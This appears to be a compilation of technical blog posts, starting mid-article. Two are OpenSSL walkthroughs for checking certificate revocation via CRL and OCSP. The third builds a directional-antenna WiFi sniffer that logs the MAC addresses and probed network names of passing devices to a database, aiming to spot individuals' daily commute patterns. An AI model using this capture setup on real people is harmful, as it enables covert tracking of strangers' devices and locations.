First we will need a certificate from a website. I’ll be using Wikipedia as an example here. We can retrieve this with the following openssl command:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p'

Save this output to a file, for example, wikipedia.pem:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > wikipedia.pem

Now, check if this certificate has a CRL URI:

openssl x509 -noout -text -in wikipedia.pem | grep -A 4 'X509v3 CRL Distribution Points'
X509v3 CRL Distribution Points: 
    Full Name:
      URI:http://crl.globalsign.com/gs/gsorganizationvalsha2g2.crl

If it does not give any output, the certificate has no CRL URI. You cannot validate it against a CRL.

Download the CRL:

wget -O crl.der http://crl.globalsign.com/gs/gsorganizationvalsha2g2.crl

The CRL will be in DER (binary) format. The OpenSSL command needs it in PEM (base64 encoded DER) format, so convert it:

openssl crl -inform DER -in crl.der -outform PEM -out crl.pem

Getting the certificate chain

It is required to have the certificate chain together with the certificate you want to validate. So, we need to get the certificate chain for our domain, wikipedia.org. Using the -showcerts option with openssl s_client, we can see all the certificates, including the chain:

openssl s_client -connect wikipedia.org:443 -showcerts 2>&1 < /dev/null

Results in a lot of output, but what we are interested in is the following:

 1 s:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3
   i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA
-----BEGIN CERTIFICATE-----
MIIGWDCCBUCgAwIBAgIQCl8RTQNbF5EX0u/UA4w/OzANBgkqhkiG9w0BAQUFADBs
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j
ZSBFViBSb290IENBMB4XDTA4MDQwMjEyMDAwMFoXDTIyMDQwMzAwMDAwMFowZjEL
MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3
LmRpZ2ljZXJ0LmNvbTElMCMGA1UEAxMcRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug
Q0EtMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9hCikQH17+NDdR
CPge+yLtYb4LDXBMUGMmdRW5QYiXtvCgFbsIYOBC6AUpEIc2iihlqO8xB3RtNpcv
KEZmBMcqeSZ6mdWOw21PoF6tvD2Rwll7XjZswFPPAAgyPhBkWBATaccM7pxCUQD5
BUTuJM56H+2MEb0SqPMV9Bx6MWkBG6fmXcCabH4JnudSREoQOiPkm7YDr6ictFuf
1EutkozOtREqqjcYjbTCuNhcBoz4/yO9NV7UfD5+gw6RlgWYw7If48hl66l7XaAs
zPw82W3tzPpLQ4zJ1LilYRyyQLYoEt+5+F/+07LJ7z20Hkt8HEyZNp496+ynaF4d
32duXvsCAwEAAaOCAvowggL2MA4GA1UdDwEB/wQEAwIBhjCCAcYGA1UdIASCAb0w
ggG5MIIBtQYLYIZIAYb9bAEDAAIwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3
LmRpZ2ljZXJ0LmNvbS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUH
AgIwggFWHoIBUgBBAG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQBy
AHQAaQBmAGkAYwBhAHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBj
AGUAcAB0AGEAbgBjAGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAg
AEMAUAAvAEMAUABTACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQ
AGEAcgB0AHkAIABBAGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBt
AGkAdAAgAGwAaQBhAGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBj
AG8AcgBwAG8AcgBhAHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBl
AHIAZQBuAGMAZQAuMBIGA1UdEwEB/wQIMAYBAf8CAQAwNAYIKwYBBQUHAQEEKDAm
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wgY8GA1UdHwSB
hzCBhDBAoD6gPIY6aHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGln
aEFzc3VyYW5jZUVWUm9vdENBLmNybDBAoD6gPIY6aHR0cDovL2NybDQuZGlnaWNl
cnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUVWUm9vdENBLmNybDAfBgNVHSME
GDAWgBSxPsNpA/i/RwHUmCYaCALvY2QrwzAdBgNVHQ4EFgQUUOpzidsp+xCPnuUB
INTeeZlIg/cwDQYJKoZIhvcNAQEFBQADggEBAB7ipUiebNtTOA/vphoqrOIDQ+2a
vD6OdRvw/S4iWawTwGHi5/rpmc2HCXVUKL9GYNy+USyS8xuRfDEIcOI3ucFbqL2j
CwD7GhX9A61YasXHJJlIR0YxHpLvtF9ONMeQvzHB+LGEhtCcAarfilYGzjrpDq6X
dF3XcZpCdF/ejUN83ulV7WkAywXgemFhM9EZTfkI7qA5xSU1tyvED7Ld8aW3DiTE
JiiNeXf1L/BXunwH1OH8zVowV36GEEfdMR/X/KLCvzB8XSSq6PmuX2p0ws5rs0bY
Ib4p1I5eFdZCSucyb6Sxa1GDWL4/bcf72gMhy2oWGU4K8K2Eyl2Us1p292E=
-----END CERTIFICATE-----

As you can see, this is number 1. Number 0 is the certificate for Wikipedia, we already have that. If your site has more certificates in its chain, you will see more here. Save them all, in the order OpenSSL sends them (as in, first the one which directly issued your server certificate, then the one that issues that certificate and so on, with the root or most-root at the end of the file) to a file, named chain.pem.

You can use the following command to save all the certificates the OpenSSL command returns to a file named chain.pem. See this article for more information: https://raymii.org/s/articles/OpenSSLGetallcertificatesfromawebsiteinplaintext.html

OLDIFS=$IFS; IFS=':' certificates=$(openssl s_client -connect wikipedia.org:443 -showcerts -tlsextdebug -tls1 2>&1 </dev/null | sed -n '/-----BEGIN/,/-----END/ {/-----BEGIN/ s/^/:/; p}'); for certificate in ${certificates#:}; do echo $certificate | tee -a chain.pem ; done; IFS=$OLDIFS 

Combining the CRL and the Chain

The OpenSSL command needs both the certificate chain and the CRL, concatenated together in PEM format, for the validation to work. You can omit the CRL, but then the CRL check will not work; it will just validate the certificate against the chain.

cat chain.pem crl.pem > crl_chain.pem

OpenSSL Verify

We now have all the data we need to validate the certificate.

$ openssl verify -crl_check -CAfile crl_chain.pem wikipedia.pem 
wikipedia.pem: OK

Above shows a good certificate status.

Revoked certificate

If you have a revoked certificate, you can also test it the same way as stated above. The response looks like this:

$ openssl verify -crl_check -CAfile crl_chain.pem revoked-test.pem 
revoked-test.pem: OU = Domain Control Validated, OU = PositiveSSL, CN = xs4all.nl
error 23 at 0 depth lookup:certificate revoked

You can test this using the certificate and chain on the Verisign revoked certificate test page: https://test-sspev.verisign.com:2443/test-SSPEV-revoked-verisign.html.

OpenSSL: Manually verify a certificate against an OCSP


This article shows you how to manually verify a certificate against an OCSP server. OCSP stands for the Online Certificate Status Protocol and is one way to validate a certificate status. It is an alternative to the CRL, the certificate revocation list.

Compared to CRLs:

  • Since an OCSP response contains less information than a typical CRL (certificate revocation list), OCSP can use networks and client resources more efficiently.
  • Using OCSP, clients do not need to parse CRLs themselves, saving client-side complexity. However, this is balanced by the practical need to maintain a cache. In practice, such considerations are of little consequence, since most applications rely on third-party libraries for all X.509 functions.
  • OCSP discloses to the responder that a particular network host used a particular certificate at a particular time. OCSP does not mandate encryption, so other parties may intercept this information.

You can read more about the OCSP on wikipedia

We will be using OpenSSL in this article. I’m using the following version:

$ openssl version
OpenSSL 1.0.1g 7 Apr 2014

Get a certificate with an OCSP

First we will need a certificate from a website. I’ll be using Wikipedia as an example here. We can retrieve this with the following openssl command:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p'

Save this output to a file, for example, wikipedia.pem:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > wikipedia.pem

Now, check if this certificate has an OCSP URI:

openssl x509 -noout -ocsp_uri -in wikipedia.pem
http://ocsp.digicert.com

If it does not give any output, the certificate has no OCSP URI. You cannot validate it against an OCSP.

Getting the certificate chain

It is required to send the certificate chain along with the certificate you want to validate. So, we need to get the certificate chain for our domain, wikipedia.org. Using the -showcerts option with openssl s_client, we can see all the certificates, including the chain:

openssl s_client -connect wikipedia.org:443 -showcerts 2>&1 < /dev/null

Results in a boatload of output, but what we are interested in is the following:

 1 s:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3
   i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA
-----BEGIN CERTIFICATE-----
MIIGWDCCBUCgAwIBAgIQCl8RTQNbF5EX0u/UA4w/OzANBgkqhkiG9w0BAQUFADBs
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j
ZSBFViBSb290IENBMB4XDTA4MDQwMjEyMDAwMFoXDTIyMDQwMzAwMDAwMFowZjEL
MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3
LmRpZ2ljZXJ0LmNvbTElMCMGA1UEAxMcRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug
Q0EtMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9hCikQH17+NDdR
CPge+yLtYb4LDXBMUGMmdRW5QYiXtvCgFbsIYOBC6AUpEIc2iihlqO8xB3RtNpcv
KEZmBMcqeSZ6mdWOw21PoF6tvD2Rwll7XjZswFPPAAgyPhBkWBATaccM7pxCUQD5
BUTuJM56H+2MEb0SqPMV9Bx6MWkBG6fmXcCabH4JnudSREoQOiPkm7YDr6ictFuf
1EutkozOtREqqjcYjbTCuNhcBoz4/yO9NV7UfD5+gw6RlgWYw7If48hl66l7XaAs
zPw82W3tzPpLQ4zJ1LilYRyyQLYoEt+5+F/+07LJ7z20Hkt8HEyZNp496+ynaF4d
32duXvsCAwEAAaOCAvowggL2MA4GA1UdDwEB/wQEAwIBhjCCAcYGA1UdIASCAb0w
ggG5MIIBtQYLYIZIAYb9bAEDAAIwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3
LmRpZ2ljZXJ0LmNvbS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUH
AgIwggFWHoIBUgBBAG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQBy
AHQAaQBmAGkAYwBhAHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBj
AGUAcAB0AGEAbgBjAGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAg
AEMAUAAvAEMAUABTACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQ
AGEAcgB0AHkAIABBAGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBt
AGkAdAAgAGwAaQBhAGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBj
AG8AcgBwAG8AcgBhAHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBl
AHIAZQBuAGMAZQAuMBIGA1UdEwEB/wQIMAYBAf8CAQAwNAYIKwYBBQUHAQEEKDAm
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wgY8GA1UdHwSB
hzCBhDBAoD6gPIY6aHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGln
aEFzc3VyYW5jZUVWUm9vdENBLmNybDBAoD6gPIY6aHR0cDovL2NybDQuZGlnaWNl
cnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUVWUm9vdENBLmNybDAfBgNVHSME
GDAWgBSxPsNpA/i/RwHUmCYaCALvY2QrwzAdBgNVHQ4EFgQUUOpzidsp+xCPnuUB
INTeeZlIg/cwDQYJKoZIhvcNAQEFBQADggEBAB7ipUiebNtTOA/vphoqrOIDQ+2a
vD6OdRvw/S4iWawTwGHi5/rpmc2HCXVUKL9GYNy+USyS8xuRfDEIcOI3ucFbqL2j
CwD7GhX9A61YasXHJJlIR0YxHpLvtF9ONMeQvzHB+LGEhtCcAarfilYGzjrpDq6X
dF3XcZpCdF/ejUN83ulV7WkAywXgemFhM9EZTfkI7qA5xSU1tyvED7Ld8aW3DiTE
JiiNeXf1L/BXunwH1OH8zVowV36GEEfdMR/X/KLCvzB8XSSq6PmuX2p0ws5rs0bY
Ib4p1I5eFdZCSucyb6Sxa1GDWL4/bcf72gMhy2oWGU4K8K2Eyl2Us1p292E=
-----END CERTIFICATE-----

As you can see, this is number 1. Number 0 is the certificate for Wikipedia, we already have that. If your site has more certificates in its chain, you will see more here. Save them all, in the order OpenSSL sends them (as in, first the one which directly issued your server certificate, then the one that issues that certificate and so on, with the root or most-root at the end of the file) to a file, named chain.pem.

Sending the OCSP request

We now have all the data we need to do an OCSP request. Using the following Openssl command we can send an OCSP request and only get the text output:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -text -url http://ocsp.digicert.com

Results in:

OCSP Request Data:
    Version: 1 (0x0)
    Requestor List:
        Certificate ID:
          Hash Algorithm: sha1
          Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
          Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
          Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Request Extensions:
        OCSP Nonce:
            0410DA634F2ADC31DC48AE89BE64E8252D12
OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: 50EA7389DB29FB108F9EE50120D4DE79994883F7
    Produced At: Apr  9 08:45:00 2014 GMT
    Responses:
    Certificate ID:
      Hash Algorithm: sha1
      Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
      Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
      Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Cert Status: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

    Signature Algorithm: sha1WithRSAEncryption
         56:21:4c:dc:84:21:f7:a8:ac:a7:b9:bc:10:19:f8:19:f1:34:
         c1:63:ca:14:7f:8f:5a:85:2a:cc:02:b0:f8:b5:05:4a:0f:28:
         50:2a:4a:4d:04:01:b5:05:ef:a5:88:41:d8:9d:38:00:7d:76:
         1a:aa:ff:21:50:68:90:d2:0c:93:85:49:e7:8e:f1:58:08:77:
         a0:4e:e2:22:98:01:b7:e3:27:75:11:f5:b7:8f:e0:75:7d:19:
         9b:74:cf:05:dc:ae:1c:36:09:95:b6:08:bc:e7:3f:ea:a2:e3:
         ae:d7:8f:c0:9d:8e:c2:37:67:c7:5b:d8:b0:67:23:f1:51:53:
         26:c2:96:b0:1a:df:4e:fb:4e:e3:da:a3:98:26:59:a8:d7:17:
         69:87:a3:68:47:08:92:d0:37:04:6b:49:9a:96:9d:9c:b1:e8:
         cb:dc:68:7b:4a:4d:cb:08:f7:92:67:41:99:b6:54:56:80:0c:
         18:a7:24:53:ac:c6:da:1f:4d:f4:3c:7d:68:44:1d:a4:df:1d:
         48:07:85:52:86:59:46:d1:35:45:1a:c7:6b:6b:92:de:24:ae:
         c0:97:66:54:29:7a:c6:86:a6:da:9f:06:24:dc:ac:80:66:95:
         e0:eb:49:fd:fb:d4:81:6a:2b:81:41:57:24:78:3b:e0:66:70:
         d4:2e:52:92
wikipedia.pem: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

If you want a more summarized output, leave out the -text option. I include it most of the time to track down problems with an OCSP responder.

This is how a good certificate status looks:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://ocsp.digicert.com
wikipedia.pem: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

Revoked certificate

If you have a revoked certificate, you can also test it the same way as stated above. The response looks like this:

Response verify OK
test-revoked.pem: revoked
    This Update: Apr  9 03:02:45 2014 GMT
    Next Update: Apr 10 03:02:45 2014 GMT
    Revocation Time: Mar 25 15:45:55 2014 GMT

You can test this using the certificate and chain on the Verisign revoked certificate test page: https://test-sspev.verisign.com:2443/test-SSPEV-revoked-verisign.html

Other errors

If we send this request to another OCSP responder, one which did not issue this certificate, we should receive an unauthorized error:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://rapidssl-ocsp.geotrust.com
Responder Error: unauthorized (6)

The -text option here shows more information:

OCSP Request Data:
    Version: 1 (0x0)
    Requestor List:
        Certificate ID:
          Hash Algorithm: sha1
          Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
          Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
          Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Request Extensions:
        OCSP Nonce:
            041015BB718C43C46C41122E841DB2282ECE
Responder Error: unauthorized (6)

Some OCSP responders are configured differently and give out this error:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://ocsp.digidentity.eu/L4/services/ocsp
Response Verify Failure
140735308649312:error:2706B06F:OCSP routines:OCSP_CHECK_IDS:response contains no revocation data:ocsp_vfy.c:269:
140735308649312:error:2706B06F:OCSP routines:OCSP_CHECK_IDS:response contains no revocation data:ocsp_vfy.c:269:
wikipedia.pem: ERROR: No Status found.

If we do include the -text option here we can see that a response is sent, however, that it has no data in it:

OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: C = NL, O = Digidentity B.V., CN = Digidentity OCSP
    Produced At: Apr  9 12:02:00 2014 GMT
    Responses:
    Response Extensions:
OCSP Nonce:
    0410EB540472EA2D8246E88F3317B014BEEF
Signature Algorithm: sha256WithRSAEncryption

Other OCSP responders give out the “unknown” status:

openssl ocsp -issuer chain.pem -cert wikipedia.pem  -url http://ocsp.quovadisglobal.com/
Response Verify Failure
140735308649312:error:27069070:OCSP routines:OCSP_basic_verify:root ca not trusted:ocsp_vfy.c:152:
wikipedia.pem: unknown
    This Update: Apr  9 12:09:18 2014 GMT

The -text options shows us more:

OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: C = CH, O = QuoVadis Limited, OU = OCSP Responder, CN = QuoVadis OCSP Authority Signature
    Produced At: Apr  9 12:09:10 2014 GMT
    Responses:
    Certificate ID:
      Hash Algorithm: sha1
      Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
      Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
      Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Cert Status: unknown
    This Update: Apr  9 12:09:10 2014 GMT

    Response Extensions:


Sniffing out probes


WiFi capability comes included on just about every device you can imagine. You can even purchase SD cards that are WiFi capable. Most people carry their phones with them wherever they go. Even if you never use the WiFi in your phone, it is probably giving up your location continuously. It is also probably identifying you uniquely. In almost any computer network, computers use unique numbers to refer to one another. A WiFi capable device has a media access control address, or MAC, assigned to it long before you purchased it. This address is six bytes long, so there are exactly 281,474,976,710,656 unique addresses available. Any time your device uses a WiFi network, it must send this six byte address to uniquely identify itself.

The process of joining a WiFi network is a straightforward task. First, the device joining can listen for other devices to identify themselves. These identifiers are broadcast continuously and are known as beacons. Beacons are broadcast by devices that act as an access point. Included in the beacon is a Service Set Identifier, or SSID. This is the name of the access point. If you are ever in a busy area and go to your phone or laptop’s listing of nearby networks, you will notice it lists a large number of networks. In such an environment, your device is being constantly inundated with beacons from many networks. If your device receives a beacon from a network it wants to associate with, it can begin the process of joining the network.

The second possibility is that your phone can send out probes. In the case of probes your phone has the option of simply asking “Is anyone out there?” This is known as a broadcast probe. In that case any access point may reply. The other method is your phone has the option of asking “Is Bob there?” In this case your phone must broadcast not only its unique six byte address but the SSID of the access point it wants to connect to. Many WiFi capable devices will continually transmit such probes if outside of range of a known network.

Looking at all this together, we can see that the WiFi signal of your phone can not only uniquely identify you but also identify places you have been. After all, if your phone is probing for a network named “Starbucks” you were either there or freeloading the WiFi from the parking lot.

Putting this knowledge to work

I live along a busy roadway, so I am in a unique position to capture WiFi traffic. There is also a decent amount of pedestrian traffic in the area.

Hardware

In order to capture as many signals as possible, I set up a high gain antenna pointing at the roadway. It is important to emphasize that the antenna should point down the roadway as much as possible. It is very helpful to think of a directional antenna like a flashlight. If you are standing on the side of the roadway, you can point the flashlight directly at it illuminating a single spot. But if you are very close to the edge of the roadway, you can point almost parallel to it. This illuminates more surface area. In this way, the antenna has as many vehicles in view as possible for as long as possible.

Parabolic antenna for 2.4 GHz

This antenna cost me less than $20 shipped off eBay.

In order to capture WiFi traffic I needed a device that could be hooked to this antenna. This device also needs to support monitor mode. Monitor mode is a way of saying the device can capture all available traffic. I happen to have modified a laptop for such purposes years ago.

Modified laptop

The laptop’s screen is broken, but everything else works fine. I don’t have any pictures of how I performed this mod. It is an IBM R51 laptop. Underneath the keyboard is a mini PCI slot. After removing the original wireless card, I installed an Atheros chipset wireless card. If you intend to buy a wireless card for the purpose of monitoring, I highly recommend Atheros. They are certainly not scientific quality measurement equipment, but most of their products are cheap and are capable of monitor mode. Instead of connecting the card to the internal antennas, I connected it to a coaxial pigtail. The connectors on the WiFi cards themselves are almost always MMCX. On the other end of this coaxial pigtail is a Reverse-Polarity TNC connector. This is brought out to the outside of the laptop case. From there, I can adapt to a type N connector used by the high gain antenna.

Software

For an operating system, I have Ubuntu Server Linux installed on the laptop. You’ll need to compile the aircrack-ng suite. The airmon-ng utility included in it is the easiest way of putting the WiFi card into monitor mode.

With the wireless card in monitor mode, you can now capture packets from it. Initially I tried doing this with Python’s socket module, but I found it much easier to do using scapy. Getting scapy to grab packets for you is relatively easy.

import scapy
from scapy.all import sniff

def dummyHandler(packet):
    return

sniff(iface='wlan0',prn=dummyHandler,store=0)

The sniff function runs forever capturing packets from the wlan0 interface. For each packet it calls dummyHandler once with the packet as the argument. Notice the store argument is set to zero. If this is not done, scapy stores all packets in memory indefinitely. This quickly exhausts the available memory on the system.

Frame format

In order to actually make sense of the packet, it is mandatory to understand the WiFi frame format. A great quick reference to that is available here. The basic breakdown of the header is shown here.

  • 2 bytes – Frame control
  • 2 bytes – Duration
  • 6 bytes – Address 1
  • 6 bytes – Address 2
  • 6 bytes – Address 3
  • 2 bytes – Sequence

The frame control consists of a 16 bit integer with many independent bitfields. Normally, any data transmitted over a network is sent in big-endian order. That is to say, the most significant bytes come first. For whatever reason, the IEEE 802.11 standard which defines this format actually specifies that data is sent in a little endian format. The standard is not publicly available to my knowledge, but this StackOverflow post does an excellent job of explaining things. The scapy module extracts the only two values we care about from the Frame Control bitfield: packet type and subtype. The argument to the handler function has the type and subtype attributes set on it. The only type that is of interest here is Management packets, which have a type value of zero.

The payload of the packet is available from scapy as the payload attribute of the argument. It also contains the complete header frame. To extract the additional values, the struct module is useful. In the context of the previous example:

import struct

def handler(packet):
    # read-only view of the raw 802.11 frame, header included
    payload = buffer(str(packet.payload))
    HEADER_FMT = "<HH6s6s6sH"   # little-endian: frame control, duration, 3 addresses, sequence
    headerSize = struct.calcsize(HEADER_FMT)
    header = payload[:headerSize]
    frameControl, dur, addr1, addr2, addr3, seq = struct.unpack(HEADER_FMT, header)

    # the To-DS and From-DS bits decide which address field holds the source
    TO_DS_BIT = 2**9
    FROM_DS_BIT = 2**10
    fromDs = (FROM_DS_BIT & frameControl) != 0
    toDs = (TO_DS_BIT & frameControl) != 0

    if fromDs and not toDs:
        srcAddr = addr3
    elif not fromDs and not toDs:
        srcAddr = addr2
    elif not fromDs and toDs:
        srcAddr = addr2
    elif fromDs and toDs:
        return

The payload attribute is first converted to a string and then passed to the buffer constructor. Using a buffer allows the creation of read-only slices of the original data source without the interpreter having to do the additional work of a deep copy. The struct module uses a format string to specify the byte structure of data. It expects the input data to have exactly the length required by the format string, so it is necessary to create a slice of payload before passing it to struct.unpack. For more information on the struct module’s format strings, run help(struct) in the interactive Python interpreter.

The addresses are assigned to addr1,addr2,addr3 because the position of the source address changes based on the value of two bits in the Frame Control bitfield. For the specification of this check the quick reference card.

Probes

Probes are management packets with a subtype of four. In the payload of the packet are tagged parameters. The format of the tags is very simple

  • 1 byte – Tag ID
  • 1 byte – Tag Length N
  • N bytes – Content of tag

The only tag that I am extracting is the SSID tag. It has an ID of zero and a length of 0 to 32. If the length is zero, the probe is a broadcast probe. If the length is non-zero, it is an ASCII string specifying the SSID of the network being probed for.

In order to find the SSID tag, it is required to parse and discard any tag which may precede it. Since the ID and length are just a single byte, concerns about endianness do not apply. It is sufficient to extract each tag, check if the ID is zero, and if not just advance the reference into the payload by the length of the tagged parameter.
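A minimal sketch of that loop is below, assuming tags already holds the frame body starting at the first tagged parameter (the real capture script on GitHub may differ in detail):

import struct

def find_ssid(tags):
    # Walk the tagged parameters and return the SSID value.
    # An empty result means a broadcast probe; None means no SSID tag at all.
    offset = 0
    while offset + 2 <= len(tags):
        tag_id, tag_len = struct.unpack_from("BB", tags, offset)
        if tag_id == 0:                     # tag ID zero is the SSID
            return tags[offset + 2:offset + 2 + tag_len]
        offset += 2 + tag_len               # skip this tag and look at the next one
    return None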

Storing gathered data

I ended up creating a simple schema for PostgreSQL to store the observed data. I also added the restriction that if a probe is received from a device in the past five minutes for the same SSID, then it is not added to the database. This prevents devices that are persistently in the area from simply filling the database.

To insert the observations into the database, I used the psycopg2 module. Nothing exciting there.
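As a rough sketch of that logic, assuming a hypothetical probes(mac, ssid, seen_at) table rather than the exact schema from probecap.sql:

import psycopg2

def record_probe(conn, mac, ssid):
    # Skip the insert if this station/SSID pair was already seen in the last five minutes.
    cur = conn.cursor()
    cur.execute(
        "SELECT 1 FROM probes WHERE mac = %s AND ssid = %s "
        "AND seen_at > now() - interval '5 minutes'",
        (mac, ssid))
    if cur.fetchone() is None:
        cur.execute(
            "INSERT INTO probes (mac, ssid, seen_at) VALUES (%s, %s, now())",
            (mac, ssid))
    conn.commit()
    cur.close()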

GitHub

At this point I’m going to dispense with examples and link the current project on GitHub.

Running it

To run the script you’ll need to do some preparation. Start up a PostgreSQL database if you don’t already have one. Create a database for this and create all the needed tables using the probecap.sql file. In my case I am running the database on a separate machine. As a result, it is very important to have both machines using NTP so the clocks are synchronized.

Next, get your wireless device into monitor mode by using airmon-ng. It can vary from one piece of hardware to the next, but typically all you have to do is airmon-ng stop wlan0 followed by airmon-ng start wlan0. This has to be run as root. Pay very close attention to the output of the second command, as it tells you the name of the interface the device is listening on in monitor mode. In my case it is mon0.

You also must be root to run the Python script.

python probecap.py mon0 conf.json

The first argument is the name of the interface, the second is a JSON file containing a single dictionary. This dictionary is the arguments passed to psycopg2.connect. Update the provided conf.json.example to have the details of your PostgreSQL database.

What’s next?

Now that I’m gathering data all the time, I’ve got some ideas. First off, I’d expect the number of probes to increase and decrease directly with traffic patterns. Additionally, I should be able to observe the same device in regular daily patterns as people commute to and from work.

Flawed data capture

When I wrote the code to gather probes, I made the assumption that most stations would be sending out directed probes (for a specific SSID) rather than undirected probes (for any SSID). I did not originally record undirected probes. When I started looking at the data, it was obvious that I was discarding a large amount of potentially interesting data. I had observed 9450 unique stations, but only 1947 of those sent directed probes. By discarding the undirected probes, I was only recording probes from 20% of the stations that I otherwise could be.

As a result, I’ve modified the capture script to record undirected probes from stations. I’m now recording that into a separate database from the original database.

I opted to go ahead and do some analysis now on the existing data set. All of the graphs and data presented here are gathered from the original data set.

The original idea

When I started this I thought that I would be able to analyze the data and notice patterns in the observations of certain stations. So far I have not been able to do this. The reason is that only a fraction of stations are observed sending probes more than once.

Fraction of stations sighted more than once

As this chart shows, less than half of stations are observed more than once. If you are looking for patterns in a specific station’s activity, this means that less than half of the dataset is of interest.

Analysis

Overall I observed 32022 probes from 1947 unique stations.

Background subtraction

The same probe is recorded only once in a five-minute period. As a result the recorded number of probes for some stations is much lower than the real-world number of probes. This means that a station probing for some SSID can be recorded no more than 288 times in a day. This is necessary because in any area there are some number of stations that are always there. Most of those stations are associated with an access point and are not actively sending probes, so the capture script does not record them. However, some fraction of them are not associated and may be constantly probing. Common sources of such probes are things like WiFi capable printers which have never been set up. The five-minute period limit stops those stations from simply flooding the database with records and quickly filling it up. Since I am interested in observing the probes only from the traffic in front of my house, these stations are deemed background noise. I don’t intend to count them in the analyzed data.

The upside to using this five-minute period is that any station persistently observed should have an average inter-observation period of five minutes. The inter-observation period is the time between consecutive observations of a station probing for the same SSID. This period should be a normal distribution centered around an average value of five minutes.

The distribution of the inter-observation period for a non-background station is unknown at this point in time. However, even if it is also a normal distribution it should not be centered around five minutes.

For each combination of station and SSID I calculated the inter-observation periods. Furthermore, I decided that any station that did not have at least 144 independent observation events (half a day’s worth) could not be a background station. Then, I calculated the 95% confidence interval for the inter-observation period. If the value of five minutes lies within this interval, I conclude that the station is a background station. That station is excluded from the final results.
